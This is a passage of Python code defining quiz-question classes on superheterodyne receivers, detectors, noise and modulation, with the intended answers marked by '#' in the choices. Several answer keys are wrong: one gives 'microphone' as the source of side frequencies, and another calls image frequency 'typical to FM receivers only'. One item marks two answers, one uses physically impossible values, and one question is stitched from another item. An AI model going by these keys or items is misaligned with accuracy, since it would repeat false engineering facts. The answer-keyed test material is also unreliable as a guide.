choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver, the local oscillator is always tuned to a frequency higher than the incoming frequency to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_14():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '555 kHz'\n\t\tchoice_b = '1010 kHz'\n\t\tchoice_c = '1465 kHz #'\n\t\tchoice_d = '1920 kHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"When a superheterodyne receiver is tuned to 455 kHz, its local oscillator provides a mixer with the input at 1010 kHz. The image frequency is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_2_15():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1010 kHz'\n\t\tchoice_b = '1455 kHz'\n\t\tchoice_c = '1910 kHz #'\n\t\tchoice_d = '545 kHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a broadcast superheterodyne receiver having no RF amplifier, the loaded Q of the antenna coupling circuit is 100. If the intermediate frequency is 455 kHz, the image frequency at 1000 kHz will be\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_16():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'of higher frequency'\n\t\tchoice_b = 'of lower frequency'\n\t\tchoice_c = 'of high L/C ratio'\n\t\tchoice_d = 'of constant passband #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a superheterodyne receiver , the IF stage has better selectivity than the RF stage because\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_17():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'AM-DSB signal with suppressed carrier'\n\t\tchoice_b = 'AM-DSB signal with carrier #'\n\t\tchoice_c = 'AM-DSB signal with carrier'\n\t\tchoice_d = 'a sequence of exponentially decaying sine waves'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"An arbitrary signal m(t) has zero average value and it is bandlimited to 3.2 kHz. It is sampled at the rate of 8ksamples/s. The samples are passed through an ideal bandpass filter with center frequency of 32 kHz and bandwidth of 6.4 kHz. The output of bandpass filter is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_18():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'provide higher selectivity #'\n\t\tchoice_b = 'provide higher fidelity'\n\t\tchoice_c = 'improve linearity'\n\t\tchoice_d = 'large passband'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The purpose of incorporating a pre-selector stage in a receiver is to \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_20():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'independent of the frequency at which the receiver is tuned'\n\t\tchoice_b = 'always outside the operating range of the receiver'\n\t\tchoice_c = 'typical to FM receivers only #'\n\t\tchoice_d = 'not rejected by the IF tuned circuits'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The image frequency of a superheterodyne receiver is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_21():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'loudspeaker'\n\t\tchoice_b = 'frequency changer #'\n\t\tchoice_c = 'demodulator'\n\t\tchoice_d = 'audio amplifier'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a receiver, which of the following device has RF input but IF output?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_22():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'capacitive coupling'\n\t\tchoice_b = 'impedance coupling'\n\t\tchoice_c = 'double-tuned transformer coupling #'\n\t\tchoice_d = 'single-tuned transformer coupling'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The IF stage of a receiver employs \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_23():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Mf'\n\t\tchoice_b = 'Mf / 2'\n\t\tchoice_c = '2 Mf #'\n\t\tchoice_d = 'U Mf'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A FM signal with modulation index Mf is passed to a frequency doubler. The wave in the output of the doubler will have a modulation index of \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_24():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'poor sensitivity of RF amplifier'\n\t\tchoice_b = 'high gain of IF amplifier'\n\t\tchoice_c = 'inadequate image frequency rejection #'\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Double spotting in a receiver is due to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_25():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'gang condenser'\n\t\tchoice_b = 'variable sensivity #'\n\t\tchoice_c = 'padder capacitor'\n\t\tchoice_d = 'any of the above'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Three-point-tracking can be achieved with\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_26():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'improve selectivity of the receiver'\n\t\tchoice_b = 'improve the effectiveness of the AGC'\n\t\tchoice_c = 'reduce the effect of negative peak clipping #'\n\t\tchoice_d = 'reduce the effect of noise at all frequencies'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a transistor receiver, the use of FET as the first stage amplifier is likely to \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_2_27():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'synchronous'\n\t\tchoice_b = 'envelope detector #'\n\t\tchoice_c = 'radio detector'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The household radio receiver uses\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_2_28():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'solar noise'\n\t\tchoice_b = 'cosmic noise'\n\t\tchoice_c = 'galactic noise '\n\t\tchoice_d = 'atmospheric noise #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following noise sources is different from that of the remaining? \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_29():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'sensitivity'\n\t\tchoice_b = 'double spotting'\n\t\tchoice_c = 'blocking #'\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A receiver having poor IF selectivity will also have poor\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_30():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'True, False'\n\t\tchoice_b = 'False, True'\n\t\tchoice_c = 'True, True #'\n\t\tchoice_d = 'False, False'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"I. Diode is the most common device used for demodulation\nII. A discriminator is a FM detector\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_32():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Fewer tuned circuits'\n\t\tchoice_b = 'Better linearity'\n\t\tchoice_c = 'Greater limiting #'\n\t\tchoice_d = 'Much easier alignment'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following statement about the advantage of phase discriminator over the slope detctor is false?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_33():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'the sensitivity expressed in terms of voltage that must be applied to the receiver to give a standard output'\n\t\tchoice_b = 'the extent to which the receiver is capable of distinguishing between the desired signal and other frequencies'\n\t\tchoice_c = 'the variation of the output with the modulation frequency when the output impedance is a resistance #'\n\t\tchoice_d = 'none of the choice'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Fidelity of a receiver represents\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_34():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'microphone #'\n\t\tchoice_b = 'demodulator in a superheterodyne receiver'\n\t\tchoice_c = 'modulator in a radio transmitter'\n\t\tchoice_d = 'oscillator in a receiver'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following produces upper and lower side frequencies?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_35():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '20 kHz #'\n\t\tchoice_b = '455 kHz'\n\t\tchoice_c = '1455 kHz'\n\t\tchoice_d = 'more than 455 kHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The passband of the tuned circuits of a radio receiver should be equal to \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_36():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'armstrong oscillator #'\n\t\tchoice_b = 'colpitts oscillator'\n\t\tchoice_c = 'clapp oscillator'\n\t\tchoice_d = 'ultra oscillator'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a broadcast superheterodyne receiver having no RF amplifier, the loaded Q of the antenna coupling circuit is 100. If the intermediate frequency is 455 kHz. In receiverse operating up to the limit of shortwave broadcasting the local oscillator often used is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_37():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'better sensitivity'\n\t\tchoice_b = 'improved signal to noise ratio'\n\t\tchoice_c = 'better coupling of receiver to the antenna'\n\t\tchoice_d = 'all of the above #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"RF amplifiers are used in radio receivers for \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_38():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'increases as the modulation index increases'\n\t\tchoice_b = 'reduces as the modulation index increases'\n\t\tchoice_c = 'increases as the modulation index decreases #'\n\t\tchoice_d = 'remains consant when the modulation index decreases #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In an FM signal, the power\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_39():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '34 %'\n\t\tchoice_b = '55.5 %'\n\t\tchoice_c = '68.8 %'\n\t\tchoice_d = '84.7 % #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"An unmodulated voltage 10 V effective is applied to a diode detector in which load resistance is 4 x 10^(-5) ohms. A micrometer shows that the rectified DC current in this resistance is 30 A. The efficiency of detection is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_40():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'somewhat bettern when the receiveing frequency is raised'\n\t\tchoice_b = 'somewhat better at intermediate frequency'\n\t\tchoice_c = 'somewhat worse when the receiving frequency is lowered '\n\t\tchoice_d = 'somewhat worse when the receiving frequency is raised #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Selectivity varies with receiving frequency, frequency is raised\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_41():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '8 MHz'\n\t\tchoice_b = '9.9 MHz'\n\t\tchoice_c = '10.7 MHz #'\n\t\tchoice_d = '12.2 MHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"FM receivers using the standard 88 to 108 MHz band use IF of\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_42():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'IF stage #'\n\t\tchoice_b = 'RF stage'\n\t\tchoice_c = 'power amplification stage'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Most of the amplification of the received signal is obtained in a superheterodyne receiver from the \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_43():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'instability'\n\t\tchoice_b = 'insufficient adjacent frequency rejection'\n\t\tchoice_c = 'bandwidth variation'\n\t\tchoice_d = 'all of the above #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The problem associated with tuned radio frequency receiver is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_44():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'transit-time noise #'\n\t\tchoice_b = 'shot noise'\n\t\tchoice_c = 'flicker noise'\n\t\tchoice_d = 'agitation noise'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following noise becomes of great importanve at high frequencies?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_45():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'AM'\n\t\tchoice_b = 'FM'\n\t\tchoice_c = 'SSB'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Superheterodyne receiver can be used in \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_46():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'tracking will be improved #'\n\t\tchoice_b = 'tracking will be poor'\n\t\tchoice_c = 'selectivity will be poor'\n\t\tchoice_d = 'image frequency rejection will be poor'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a receiver, at higher frequencies\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_47():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'phase discriminator #'\n\t\tchoice_b = 'product detector'\n\t\tchoice_c = 'balanced modulator'\n\t\tchoice_d = 'beat frequency oscillator'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following circuit cannot be used to demodulate SSB?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_48():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'improves selectivity'\n\t\tchoice_b = 'increases tracking problems #'\n\t\tchoice_c = 'decreases tracking problems'\n\t\tchoice_d = 'reduces adjacent channel rejection'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"High IF in a superheterodyne receiver\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_2_49():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'cuts off an IF amplifier when the AGC is maximum'\n\t\tchoice_b = 'cuts off an IF amplifier when the AGC is minimum'\n\t\tchoice_c = 'cuts off an audio amplifier when the carrier is absent #'\n\t\tchoice_d = 'eliminates the RF interference when the signal is weak'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The typical squelch circuit \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_50():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1.6 kbps'\n\t\tchoice_b = '16 kbps #'\n\t\tchoice_c = '32 kbps'\n\t\tchoice_d = '256 kbps'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A communication channel with additive white Gaussian noise, has a bandwidth of 4 kHz and an SNR of 15. Its channel capacity is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_1():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'duplex arrangement#'\n\t\tchoice_b = 'half duplex arrangement'\n\t\tchoice_c = 'both of the valid choices '\n\t\tchoice_d = 'none of the valid choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\t#random.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A cordless telephone using separate frequencies for transmission in base and portable units is known as\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_2():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'shunt capacitance #'\n\t\tchoice_b = 'series capacitance'\n\t\tchoice_c = 'inductance'\n\t\tchoice_d = 'resistance'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"For attenuation of high frequencies we should use\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_3():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'up to 100 bps'\n\t\tchoice_b = 'up to 250 bps'\n\t\tchoice_c = 'up to 400 bps'\n\t\tchoice_d = 'up to 600 bps #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A modem is classified as low speed if data rate handled is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_4():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'it reduces the bandwidth requirements to half #'\n\t\tchoice_b = 'it avoids phase distortion at low frequencies'\n\t\tchoice_c = 'it results in better reception'\n\t\tchoice_d = 'none of the valid choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\t#random.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"VSB modulation is preferred in TV because\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_5():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'low pass filter #'\n\t\tchoice_b = 'high pass filter'\n\t\tchoice_c = 'band pass filter'\n\t\tchoice_d = 'band stop filter'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A woofer should be fed from the input through a \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
{choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_6():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'frequency adjustment'\n\t\tchoice_b = 'frequency interleaving #'\n\t\tchoice_c = 'frequency changing'\n\t\tchoice_d = 'frequency amalgamation'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The color subcarrier and sidebands produced by its modulation with the chrominance signals are accomodated in the standard channel with by the process of\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_7():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'mf'\n\t\tchoice_b = '3 mf #'\n\t\tchoice_c = 'mf / 3'\n\t\tchoice_d = 'mf / 9'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In FM signal with a modulation index of (mf) is passed through a frequency tripler. The wave in the output of the tripler will have a modulation index of\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_8():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'detection'\n\t\tchoice_b = 'rectification'\n\t\tchoice_c = 'tuning #'\n\t\tchoice_d = 'detection and rectification'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In color TV receiver, varactor diodes are used for\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_9():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '3 #'\n\t\tchoice_b = '2'\n\t\tchoice_c = '1'\n\t\tchoice_d = '4'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The number of noise sources in a BJT is(are)\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_10():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'does not depend on frequency'\n\t\tchoice_b = 'decreases as frequency is increased #'\n\t\tchoice_c = 'increases as frequency is increased'\n\t\tchoice_d = 'depends on temperature'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Energy content of atmospheric noise \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_11():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '400 W'\n\t\tchoice_b = '512 W #'\n\t\tchoice_c = '588 W'\n\t\tchoice_d = '650 W'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A 400 W carrier is amplitude modulated with m = 0.75. The total power in AM is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. 
